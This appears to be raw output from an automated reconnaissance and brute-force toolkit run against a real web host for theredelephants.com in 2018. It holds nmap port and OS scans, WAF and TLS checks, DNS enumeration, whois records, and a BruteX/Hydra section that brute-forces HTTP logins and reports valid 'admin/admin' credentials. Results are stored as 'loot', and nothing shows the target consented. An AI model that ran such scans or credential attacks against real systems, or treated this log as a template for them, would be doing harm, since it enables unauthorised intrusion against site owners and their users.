- HOP RTT ADDRESS
- 1 121.82 ms 10.245.200.1
- 2 121.86 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
- 3 122.58 ms 195.42.145.65
- 4 130.10 ms 108.170.244.240
- 5 130.08 ms 72.14.238.53
- 6 202.55 ms 216.239.54.84
- 7 213.80 ms 209.85.255.252
- 8 212.77 ms 216.239.41.232
- 9 ... 17
- 18 209.18 ms 104.196.67.80
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-08 00:07 EST
- Nmap scan report for 104.196.67.80
- Host is up (0.22s latency).
- PORT STATE SERVICE VERSION
- 69/udp open|filtered tftp
- Too many fingerprints match this host to give specific OS details
- Network Distance: 18 hops
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 118.49 ms 10.245.200.1
- 2 170.38 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
- 3 119.32 ms 195.42.145.65
- 4 126.81 ms 108.170.244.240
- 5 126.78 ms 72.14.238.53
- 6 198.99 ms 216.239.54.84
- 7 210.34 ms 209.85.255.252
- 8 210.38 ms 216.239.41.232
- 9 ... 17
- 18 207.84 ms 104.196.67.80
- #######################################################################################################################################
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://104.196.67.80
- Generic Detection results:
- The site http://104.196.67.80 seems to be behind a WAF or some sort of security solution
- Reason: Blocking is being done at connection/packet level.
- Number of requests: 12
- #######################################################################################################################################
- http://104.196.67.80 [404 Not Found] Country[UNITED STATES][US], HTML5, IP[104.196.67.80], Title[Site Not Configured | 404 Not Found], probably WordPress
- #######################################################################################################################################
- wig - WebApp Information Gatherer
- Scanning http://104.196.67.80...
- _________________ SITE INFO __________________
- IP Title
- 104.196.67.80 Site Not Configured | 404 No
- __________________ VERSION ___________________
- Name Versions Type
- ______________________________________________
- Time: 32.2 sec Urls: 598 Fingerprints: 40401
- #######################################################################################################################################
- HTTP/1.1 404 Not Found
- Date: Thu, 08 Nov 2018 05:11:38 GMT
- Content-Type: text/html
- ETag: W/"5be3223e-822"
- Content-Encoding: gzip
- Connection: keep-alive
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-08 00:11 EST
- Nmap scan report for 104.196.67.80
- Host is up (0.21s latency).
- PORT STATE SERVICE VERSION
- 123/udp open|filtered ntp
- Too many fingerprints match this host to give specific OS details
- Network Distance: 18 hops
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 119.24 ms 10.245.200.1
- 2 240.18 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
- 3 120.16 ms 195.42.145.65
- 4 128.15 ms 108.170.244.240
- 5 127.42 ms 72.14.238.53
- 6 199.49 ms 216.239.54.84
- 7 210.91 ms 209.85.255.252
- 8 211.28 ms 216.239.41.232
- 9 ... 17
- 18 208.48 ms 104.196.67.80
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-08 00:14 EST
- Nmap scan report for 104.196.67.80
- Host is up (0.16s latency).
- PORT STATE SERVICE VERSION
- 161/tcp filtered snmp
- 161/udp open|filtered snmp
- Too many fingerprints match this host to give specific OS details
- Network Distance: 18 hops
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 119.45 ms 10.245.200.1
- 2 119.49 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
- 3 120.08 ms 195.42.145.65
- 4 127.88 ms 108.170.244.240
- 5 130.71 ms 72.14.238.53
- 6 200.08 ms 216.239.54.84
- 7 240.66 ms 209.85.255.252
- 8 211.57 ms 216.239.41.232
- 9 ... 17
- 18 209.02 ms 104.196.67.80
- #######################################################################################################################################
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking https://104.196.67.80
- Generic Detection results:
- The site https://104.196.67.80 seems to be behind a WAF or some sort of security solution
- Reason: Blocking is being done at connection/packet level.
- Number of requests: 12
- #######################################################################################################################################
- https://104.196.67.80 [404 Not Found] Country[UNITED STATES][US], HTML5, HTTPServer[nginx], IP[104.196.67.80], Title[Site Not Configured | 404 Not Found], probably WordPress, nginx
- #######################################################################################################################################
- AVAILABLE PLUGINS
- -----------------
- PluginOpenSSLCipherSuites
- PluginCompression
- PluginCertInfo
- PluginChromeSha1Deprecation
- PluginSessionResumption
- PluginHSTS
- PluginSessionRenegotiation
- PluginHeartbleed
- CHECKING HOST(S) AVAILABILITY
- -----------------------------
- 104.196.67.80:443 => 104.196.67.80:443
- SCAN RESULTS FOR 104.196.67.80:443 - 104.196.67.80:443
- ------------------------------------------------------
- * Deflate Compression:
- OK - Compression disabled
- * Session Renegotiation:
- Client-initiated Renegotiations: OK - Rejected
- Secure Renegotiation: OK - Supported
- * Certificate - Content:
- SHA1 Fingerprint: 0707f8a55c34596e0f7f1eabf202d40d9f0505cd
- Common Name: *.wpengine.com
- Issuer: RapidSSL RSA CA 2018
- Serial Number: 050E0BC8753CB966CCD109DFB99C23B2
- Not Before: Feb 1 00:00:00 2018 GMT
- Not After: Jul 20 12:00:00 2019 GMT
- Signature Algorithm: sha256WithRSAEncryption
- Public Key Algorithm: rsaEncryption
- Key Size: 2048 bit
- Exponent: 65537 (0x10001)
- X509v3 Subject Alternative Name: {'DNS': ['*.wpengine.com', 'wpengine.com']}
- * Certificate - Trust:
- Hostname Validation: FAILED - Certificate does NOT match 104.196.67.80
- Google CA Store (09/2015): OK - Certificate is trusted
- Java 6 CA Store (Update 65): OK - Certificate is trusted
- Microsoft CA Store (09/2015): OK - Certificate is trusted
- Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
- Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
- Certificate Chain Received: ['*.wpengine.com', 'RapidSSL RSA CA 2018', 'DigiCert Global Root CA']
- * Certificate - OCSP Stapling:
- NOT SUPPORTED - Server did not send back an OCSP response.
- * Session Resumption:
- With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
- With TLS Session Tickets: OK - Supported
- * SSLV2 Cipher Suites:
- Server rejected all cipher suites.
- * SSLV3 Cipher Suites:
- Server rejected all cipher suites.
- SCAN COMPLETED IN 4.49 S
- ------------------------
- Version: 1.11.12-static
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- Connected to 104.196.67.80
- Testing SSL server 104.196.67.80 on port 443 using SNI name 104.196.67.80
- TLS Fallback SCSV:
- Server supports TLS Fallback SCSV
- TLS renegotiation:
- Session renegotiation not supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.0 not vulnerable to heartbleed
- Supported Server Cipher(s):
- Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
- Accepted TLSv1.2 256 bits AES256-GCM-SHA384
- Accepted TLSv1.2 128 bits AES128-GCM-SHA256
- Accepted TLSv1.2 256 bits AES256-SHA256
- Accepted TLSv1.2 256 bits AES256-SHA
- Accepted TLSv1.2 128 bits AES128-SHA256
- Accepted TLSv1.2 128 bits AES128-SHA
- Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
- Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
- Accepted TLSv1.1 256 bits AES256-SHA
- Accepted TLSv1.1 128 bits AES128-SHA
- SSL Certificate:
- Signature Algorithm: sha256WithRSAEncryption
- RSA Key Strength: 2048
- Subject: *.wpengine.com
- Altnames: DNS:*.wpengine.com, DNS:wpengine.com
- Issuer: RapidSSL RSA CA 2018
- Not valid before: Feb 1 00:00:00 2018 GMT
- Not valid after: Jul 20 12:00:00 2019 GMT
- #######################################################################################################################################
- I, [2018-11-08T00:18:21.755791 #4160] INFO -- : Initiating port scan
- I, [2018-11-08T00:19:25.568537 #4160] INFO -- : Using nmap scan output file logs/nmap_output_2018-11-08_00-18-21.xml
- I, [2018-11-08T00:19:25.569589 #4160] INFO -- : Discovered open port: 104.196.67.80:80
- I, [2018-11-08T00:19:26.484740 #4160] INFO -- : Discovered open port: 104.196.67.80:443
- I, [2018-11-08T00:19:28.202920 #4160] INFO -- : <<<Enumerating vulnerable applications>>>
- --------------------------------------------------------
- <<<Yasuo discovered following vulnerable applications>>>
- --------------------------------------------------------
- +----------+--------------------+-------------------+----------+----------+
- | App Name | URL to Application | Potential Exploit | Username | Password |
- +----------+--------------------+-------------------+----------+----------+
- +----------+--------------------+-------------------+----------+----------+
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-08 00:22 EST
- NSE: Loaded 148 scripts for scanning.
- NSE: Script Pre-scanning.
- Initiating NSE at 00:22
- Completed NSE at 00:22, 0.00s elapsed
- Initiating NSE at 00:22
- Completed NSE at 00:22, 0.00s elapsed
- Initiating Parallel DNS resolution of 1 host. at 00:22
- Completed Parallel DNS resolution of 1 host. at 00:22, 16.50s elapsed
- Initiating SYN Stealth Scan at 00:22
- Scanning 104.196.67.80 [474 ports]
- Discovered open port 443/tcp on 104.196.67.80
- Discovered open port 80/tcp on 104.196.67.80
- Discovered open port 2222/tcp on 104.196.67.80
- Completed SYN Stealth Scan at 00:22, 7.36s elapsed (474 total ports)
- Initiating Service scan at 00:22
- Scanning 3 services on 104.196.67.80
- Completed Service scan at 00:23, 33.97s elapsed (3 services on 1 host)
- Initiating OS detection (try #1) against 104.196.67.80
- Retrying OS detection (try #2) against 104.196.67.80
- Initiating Traceroute at 00:23
- Completed Traceroute at 00:23, 0.13s elapsed
- Initiating Parallel DNS resolution of 2 hosts. at 00:23
- Completed Parallel DNS resolution of 2 hosts. at 00:23, 16.50s elapsed
- NSE: Script scanning 104.196.67.80.
- Initiating NSE at 00:23
- Completed NSE at 00:23, 8.07s elapsed
- Initiating NSE at 00:23
- Completed NSE at 00:23, 0.00s elapsed
- Nmap scan report for 104.196.67.80
- Host is up (0.12s latency).
- Not shown: 468 filtered ports
- PORT STATE SERVICE VERSION
- 25/tcp closed smtp
- 80/tcp open http-proxy Squid http proxy
- | http-methods:
- |_ Supported Methods: GET HEAD
- |_http-open-proxy: Proxy might be redirecting requests
- |_http-title: Site Not Configured | 404 Not Found
- 139/tcp closed netbios-ssn
- 443/tcp open ssl/http nginx
- | http-methods:
- |_ Supported Methods: GET HEAD
- |_http-server-header: nginx
- |_http-title: Site Not Configured | 404 Not Found
- | ssl-cert: Subject: commonName=*.wpengine.com
- | Subject Alternative Name: DNS:*.wpengine.com, DNS:wpengine.com
- | Issuer: commonName=RapidSSL RSA CA 2018/organizationName=DigiCert Inc/countryName=US
- | Public Key type: rsa
- | Public Key bits: 2048
- | Signature Algorithm: sha256WithRSAEncryption
- | Not valid before: 2018-02-01T00:00:00
- | Not valid after: 2019-07-20T12:00:00
- | MD5: 78f7 9fa1 664d 3813 0245 5d39 813d d072
- |_SHA-1: 0707 f8a5 5c34 596e 0f7f 1eab f202 d40d 9f05 05cd
- |_ssl-date: TLS randomness does not represent time
- | tls-alpn:
- | h2
- |_ http/1.1
- | tls-nextprotoneg:
- | h2
- |_ http/1.1
- 445/tcp closed microsoft-ds
- 2222/tcp open ssh ProFTPD mod_sftp 0.9.9 (protocol 2.0)
- Device type: general purpose|storage-misc|broadband router|WAP|phone
- Running (JUST GUESSING): Linux 3.X|4.X|2.6.X (94%), HP embedded (91%), Asus embedded (87%), Google Android 4.X (87%)
- OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/h:hp:p2000_g3 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel cpe:/h:asus:rt-ac66u cpe:/o:google:android:4.0
- Aggressive OS guesses: Linux 3.16 - 4.6 (94%), Linux 3.10 - 4.11 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 4.2 (92%), Linux 4.4 (92%), Linux 3.18 (91%), HP P2000 G3 NAS device (91%), Linux 3.2 - 4.9 (90%), Linux 3.16 (90%)
- No exact OS matches for host (test conditions non-ideal).
- Uptime guess: 85.924 days (since Tue Aug 14 03:12:44 2018)
- Network Distance: 2 hops
- TCP Sequence Prediction: Difficulty=261 (Good luck!)
- IP ID Sequence Generation: All zeros
- TRACEROUTE (using port 25/tcp)
- HOP RTT ADDRESS
- 1 118.84 ms 10.245.200.1
- 2 118.84 ms 104.196.67.80
- NSE: Script Post-scanning.
- Initiating NSE at 00:23
- Completed NSE at 00:23, 0.00s elapsed
- Initiating NSE at 00:23
- Completed NSE at 00:23, 0.00s elapsed
- Read data files from: /usr/bin/../share/nmap
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 87.85 seconds
- Raw packets sent: 1015 (48.690KB) | Rcvd: 787 (361.519KB)
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-08 00:23 EST
- NSE: Loaded 148 scripts for scanning.
- NSE: Script Pre-scanning.
- Initiating NSE at 00:23
- Completed NSE at 00:23, 0.00s elapsed
- Initiating NSE at 00:23
- Completed NSE at 00:23, 0.00s elapsed
- Initiating Parallel DNS resolution of 1 host. at 00:23
- Completed Parallel DNS resolution of 1 host. at 00:24, 16.50s elapsed
- Initiating UDP Scan at 00:24
- Scanning 104.196.67.80 [14 ports]
- Completed UDP Scan at 00:24, 2.15s elapsed (14 total ports)
- Initiating Service scan at 00:24
- Scanning 12 services on 104.196.67.80
- Service scan Timing: About 8.33% done; ETC: 00:43 (0:17:47 remaining)
- Completed Service scan at 00:25, 102.57s elapsed (12 services on 1 host)
- Initiating OS detection (try #1) against 104.196.67.80
- Retrying OS detection (try #2) against 104.196.67.80
- Initiating Traceroute at 00:25
- Completed Traceroute at 00:25, 7.19s elapsed
- Initiating Parallel DNS resolution of 1 host. at 00:25
- Completed Parallel DNS resolution of 1 host. at 00:26, 16.50s elapsed
- NSE: Script scanning 104.196.67.80.
- Initiating NSE at 00:26
- Completed NSE at 00:26, 20.36s elapsed
- Initiating NSE at 00:26
- Completed NSE at 00:26, 1.03s elapsed
- Nmap scan report for 104.196.67.80
- Host is up (0.16s latency).
- PORT STATE SERVICE VERSION
- 53/udp open|filtered domain
- 67/udp open|filtered dhcps
- 68/udp open|filtered dhcpc
- 69/udp open|filtered tftp
- 88/udp open|filtered kerberos-sec
- 123/udp open|filtered ntp
- 137/udp filtered netbios-ns
- 138/udp filtered netbios-dgm
- 139/udp open|filtered netbios-ssn
- 161/udp open|filtered snmp
- 162/udp open|filtered snmptrap
- 389/udp open|filtered ldap
- 520/udp open|filtered route
- 2049/udp open|filtered nfs
- Too many fingerprints match this host to give specific OS details
- TRACEROUTE (using port 138/udp)
- HOP RTT ADDRESS
- 1 119.31 ms 10.245.200.1
- 2 ... 3
- 4 117.88 ms 10.245.200.1
- 5 119.52 ms 10.245.200.1
- 6 119.51 ms 10.245.200.1
- 7 119.49 ms 10.245.200.1
- 8 119.47 ms 10.245.200.1
- 9 119.44 ms 10.245.200.1
- 10 119.41 ms 10.245.200.1
- 11 ... 18
- 19 117.81 ms 10.245.200.1
- 20 118.24 ms 10.245.200.1
- 21 ... 28
- 29 117.63 ms 10.245.200.1
- 30 117.02 ms 10.245.200.1
- NSE: Script Post-scanning.
- Initiating NSE at 00:26
- Completed NSE at 00:26, 0.00s elapsed
- Initiating NSE at 00:26
- Completed NSE at 00:26, 0.00s elapsed
- Read data files from: /usr/bin/../share/nmap
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 171.92 seconds
- Raw packets sent: 135 (8.008KB) | Rcvd: 463 (94.350KB)
- ====================================================================================
- RUNNING BRUTE FORCE
- ====================================================================================
- __________ __ ____ ___
- \______ \_______ __ ___/ |_ ____ \ \/ /
- | | _/\_ __ \ | \ __\/ __ \ \ /
- | | \ | | \/ | /| | \ ___/ / \
- |______ / |__| |____/ |__| \___ >___/\ \
- \/ \/ \_/
- + -- --=[BruteX v1.7 by 1N3
- + -- --=[http://crowdshield.com
- ################################### Running Port Scan ##############################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-08 00:26 EST
- Nmap scan report for 104.196.67.80
- Host is up (0.14s latency).
- Not shown: 21 filtered ports, 3 closed ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 80/tcp open http
- 443/tcp open https
- Nmap done: 1 IP address (1 host up) scanned in 19.11 seconds
- ################################### Running Brute Force ############################
- + -- --=[Port 21 closed... skipping.
- + -- --=[Port 22 closed... skipping.
- + -- --=[Port 23 closed... skipping.
- + -- --=[Port 25 closed... skipping.
- + -- --=[Port 80 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-08 00:26:57
- [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
- [DATA] attacking http-get://104.196.67.80:80//
- [80][http-get] host: 104.196.67.80 login: admin password: admin
- [STATUS] attack finished for 104.196.67.80 (valid pair found)
- 1 of 1 target successfully completed, 1 valid password found
- Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-08 00:26:58
- + -- --=[Port 110 closed... skipping.
- + -- --=[Port 139 closed... skipping.
- + -- --=[Port 162 closed... skipping.
- + -- --=[Port 389 closed... skipping.
- + -- --=[Port 443 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-08 00:26:58
- [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
- [DATA] attacking http-gets://104.196.67.80:443//
- [443][http-get] host: 104.196.67.80 login: admin password: admin
- [STATUS] attack finished for 104.196.67.80 (valid pair found)
- 1 of 1 target successfully completed, 1 valid password found
- Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-08 00:26:59
- + -- --=[Port 445 closed... skipping.
- + -- --=[Port 512 closed... skipping.
- + -- --=[Port 513 closed... skipping.
- + -- --=[Port 514 closed... skipping.
- + -- --=[Port 993 closed... skipping.
- + -- --=[Port 1433 closed... skipping.
- + -- --=[Port 1521 closed... skipping.
- + -- --=[Port 3306 closed... skipping.
- + -- --=[Port 3389 closed... skipping.
- + -- --=[Port 5432 closed... skipping.
- + -- --=[Port 5900 closed... skipping.
- + -- --=[Port 5901 closed... skipping.
- + -- --=[Port 8000 closed... skipping.
- + -- --=[Port 8080 closed... skipping.
- + -- --=[Port 8100 closed... skipping.
- + -- --=[Port 6667 closed... skipping.
- ################################### Done! #############################################################################################
- * default
- * default
- [*] Importing 'Nmap XML' data
- [*] Import: Parsing with 'Nokogiri v1.8.5'
- [*] Importing host 104.196.67.80
- [*] Successfully imported /usr/share/sniper/loot/104.196.67.80/nmap/nmap-104.196.67.80-udp.xml
- [*] Importing 'Nmap XML' data
- [*] Import: Parsing with 'Nokogiri v1.8.5'
- [*] Importing host 104.196.67.80
- [*] Successfully imported /usr/share/sniper/loot/104.196.67.80/nmap/nmap-104.196.67.80.xml
- [*] Importing 'Nmap XML' data
- [*] Import: Parsing with 'Nokogiri v1.8.5'
- [*] Importing host 104.196.67.80
- [*] Successfully imported /usr/share/sniper/loot/104.196.67.80/nmap/nmap-udp-104.196.67.80.xml
- Hosts
- =====
- address mac name os_name os_flavor os_sp purpose info comments
- ------- --- ---- ------- --------- ----- ------- ---- --------
- 91.121.2.184 Linux 2.6.X server
- 104.196.67.80 Linux 3.X server
- 195.55.47.89 Windows 3.X device
- Services
- ========
- host port proto name state info
- ---- ---- ----- ---- ----- ----
- 91.121.2.184 22 tcp ssh open OpenSSH 5.3 protocol 2.0
- 91.121.2.184 25 tcp smtp closed
- 91.121.2.184 53 udp domain unknown
- 91.121.2.184 67 udp dhcps unknown
- 91.121.2.184 68 udp dhcpc unknown
- 91.121.2.184 69 udp tftp unknown
- 91.121.2.184 80 tcp http open Apache httpd PHP 5.6.14
- 91.121.2.184 88 udp kerberos-sec unknown
- 91.121.2.184 123 udp ntp unknown
- 91.121.2.184 137 udp netbios-ns filtered
- 91.121.2.184 138 udp netbios-dgm filtered
- 91.121.2.184 139 tcp netbios-ssn closed
- 91.121.2.184 139 udp netbios-ssn unknown
- 91.121.2.184 161 udp snmp unknown
- 91.121.2.184 162 udp snmptrap unknown
- 91.121.2.184 389 tcp ldap open OpenLDAP 2.2.X - 2.3.X
- 91.121.2.184 389 udp ldap unknown
- 91.121.2.184 443 tcp ssl/ssl open Apache httpd SSL-only mode
- 91.121.2.184 445 tcp microsoft-ds closed
- 91.121.2.184 465 tcp ssl/smtps open
- 91.121.2.184 520 udp route unknown
- 91.121.2.184 993 tcp ssl/imaps open
- 91.121.2.184 2049 udp nfs unknown
- 91.121.2.184 7071 tcp ssl/iwg1 open
- 91.121.2.184 8080 tcp ssh open OpenSSH 5.3 protocol 2.0
- 104.196.67.80 25 tcp smtp closed
- 104.196.67.80 53 udp domain unknown
- 104.196.67.80 67 udp dhcps unknown
- 104.196.67.80 68 udp dhcpc unknown
- 104.196.67.80 69 udp tftp unknown
- 104.196.67.80 80 tcp http-proxy open Squid http proxy
- 104.196.67.80 88 udp kerberos-sec unknown
- 104.196.67.80 123 udp ntp unknown
- 104.196.67.80 137 udp netbios-ns filtered
- 104.196.67.80 138 udp netbios-dgm filtered
- 104.196.67.80 139 tcp netbios-ssn closed
- 104.196.67.80 139 udp netbios-ssn unknown
- 104.196.67.80 161 udp snmp unknown
- 104.196.67.80 162 udp snmptrap unknown
- 104.196.67.80 389 udp ldap unknown
- 104.196.67.80 443 tcp ssl/http open nginx
- 104.196.67.80 445 tcp microsoft-ds closed
- 104.196.67.80 520 udp route unknown
- 104.196.67.80 2049 udp nfs unknown
- 104.196.67.80 2222 tcp ssh open ProFTPD mod_sftp 0.9.9 protocol 2.0
- 195.55.47.89 25 tcp smtp closed
- 195.55.47.89 53 udp domain unknown
- 195.55.47.89 67 udp dhcps unknown
- 195.55.47.89 68 udp dhcpc unknown
- 195.55.47.89 69 udp tftp unknown
- 195.55.47.89 80 tcp http-proxy open Squid http proxy
- 195.55.47.89 88 udp kerberos-sec unknown
- 195.55.47.89 113 tcp ident closed
- 195.55.47.89 123 udp ntp unknown
- 195.55.47.89 137 udp netbios-ns filtered
- 195.55.47.89 138 udp netbios-dgm filtered
- 195.55.47.89 139 tcp netbios-ssn closed
- 195.55.47.89 139 udp netbios-ssn unknown
- 195.55.47.89 161 udp snmp unknown
- 195.55.47.89 162 udp snmptrap unknown
- 195.55.47.89 389 udp ldap unknown
- 195.55.47.89 443 tcp https open Microsoft-HTTPAPI/2.0
- 195.55.47.89 445 tcp microsoft-ds closed
- 195.55.47.89 520 udp route unknown
- 195.55.47.89 2049 udp nfs unknown
- #######################################################################################################################################
- dnsenum VERSION:1.2.4
- ----- theredelephants.com -----
- Host's addresses:
- __________________
- theredelephants.com. 494 IN A 104.196.67.80
- Name Servers:
- ______________
- ns57.domaincontrol.com. 86320 IN A 216.69.185.29
- ns58.domaincontrol.com. 86394 IN A 173.201.76.29
- Mail (MX) Servers:
- ___________________
- theredelephants-com.mail.protection.outlook.com. 10 IN A 216.32.181.234
- theredelephants-com.mail.protection.outlook.com. 10 IN A 216.32.181.106
- Trying Zone Transfers and getting Bind Versions:
- _________________________________________________
- Trying Zone Transfer for theredelephants.com on ns57.domaincontrol.com ...
- Trying Zone Transfer for theredelephants.com on ns58.domaincontrol.com ...
- brute force file not specified, bay.
- #######################################################################################################################################
- Domain Name: THEREDELEPHANTS.COM
- Registry Domain ID: 2073176903_DOMAIN_COM-VRSN
- Registrar WHOIS Server: whois.godaddy.com
- Registrar URL: http://www.godaddy.com
- Updated Date: 2016-11-10T21:43:26Z
- Creation Date: 2016-11-10T21:43:26Z
- Registry Expiry Date: 2019-11-10T21:43:26Z
- Registrar: GoDaddy.com, LLC
- Registrar IANA ID: 146
- Registrar Abuse Contact Email: abuse@godaddy.com
- Registrar Abuse Contact Phone: 480-624-2505
- Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
- Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
- Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
- Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
- Name Server: NS57.DOMAINCONTROL.COM
- Name Server: NS58.DOMAINCONTROL.COM
- DNSSEC: unsigned
- URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
- >>> Last update of whois database: 2018-11-08T05:02:20Z <<<
- For more information on Whois status codes, please visit https://icann.org/epp
- NOTICE: The expiration date displayed in this record is the date the
- registrar's sponsorship of the domain name registration in the registry is
- currently set to expire. This date does not necessarily reflect the expiration
- date of the domain name registrant's agreement with the sponsoring
- registrar. Users may consult the sponsoring registrar's Whois database to
- view the registrar's reported date of expiration for this registration.
- TERMS OF USE: You are not authorized to access or query our Whois
- database through the use of electronic processes that are high-volume and
- automated except as reasonably necessary to register domain names or
- modify existing registrations; the Data in VeriSign Global Registry
- Services' ("VeriSign") Whois database is provided by VeriSign for
- information purposes only, and to assist persons in obtaining information
- about or related to a domain name registration record. VeriSign does not
- guarantee its accuracy. By submitting a Whois query, you agree to abide
- by the following terms of use: You agree that you may use this Data only
- for lawful purposes and that under no circumstances will you use this Data
- to: (1) allow, enable, or otherwise support the transmission of mass
- unsolicited, commercial advertising or solicitations via e-mail, telephone,
- or facsimile; or (2) enable high volume, automated, electronic processes
- that apply to VeriSign (or its computer systems). The compilation,
- repackaging, dissemination or other use of this Data is expressly
- prohibited without the prior written consent of VeriSign. You agree not to
- use electronic processes that are automated and high-volume to access or
- query the Whois database except as reasonably necessary to register
- domain names or modify existing registrations. VeriSign reserves the right
- to restrict your access to the Whois database in its sole discretion to ensure
- operational stability. VeriSign may restrict or terminate your access to the
- Whois database for failure to abide by these terms of use. VeriSign
- reserves the right to modify these terms at any time.
- The Registry database contains ONLY .COM, .NET, .EDU domains and
- Registrars.
- Domain Name: theredelephants.com
- Registry Domain ID: 2073176903_DOMAIN_COM-VRSN
- Registrar WHOIS Server: whois.godaddy.com
- Registrar URL: http://www.godaddy.com
- Updated Date: 2016-11-10T21:43:26Z
- Creation Date: 2016-11-10T21:43:26Z
- Registrar Registration Expiration Date: 2019-11-10T21:43:26Z
- Registrar: GoDaddy.com, LLC
- Registrar IANA ID: 146
- Registrar Abuse Contact Email: abuse@godaddy.com
- Registrar Abuse Contact Phone: +1.4806242505
- Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
- Domain Status: clientUpdateProhibited http://www.icann.org/epp#clientUpdateProhibited
- Domain Status: clientRenewProhibited http://www.icann.org/epp#clientRenewProhibited
- Domain Status: clientDeleteProhibited http://www.icann.org/epp#clientDeleteProhibited
- Registry Registrant ID: Not Available From Registry
- Registrant Name: Registration Private
- Registrant Organization: Domains By Proxy, LLC
- Registrant Street: DomainsByProxy.com
- Registrant Street: 14455 N. Hayden Road
- Registrant City: Scottsdale
- Registrant State/Province: Arizona
- Registrant Postal Code: 85260
- Registrant Country: US
- Registrant Phone: +1.4806242599
- Registrant Phone Ext:
- Registrant Fax: +1.4806242598
- Registrant Fax Ext:
- Registrant Email: theredelephants.com@domainsbyproxy.com
- Registry Admin ID: Not Available From Registry
- Admin Name: Registration Private
- Admin Organization: Domains By Proxy, LLC
- Admin Street: DomainsByProxy.com
- Admin Street: 14455 N. Hayden Road
- Admin City: Scottsdale
- Admin State/Province: Arizona
- Admin Postal Code: 85260
- Admin Country: US
- Admin Phone: +1.4806242599
- Admin Phone Ext:
- Admin Fax: +1.4806242598
- Admin Fax Ext:
- Admin Email: theredelephants.com@domainsbyproxy.com
- Registry Tech ID: Not Available From Registry
- Tech Name: Registration Private
- Tech Organization: Domains By Proxy, LLC
- Tech Street: DomainsByProxy.com
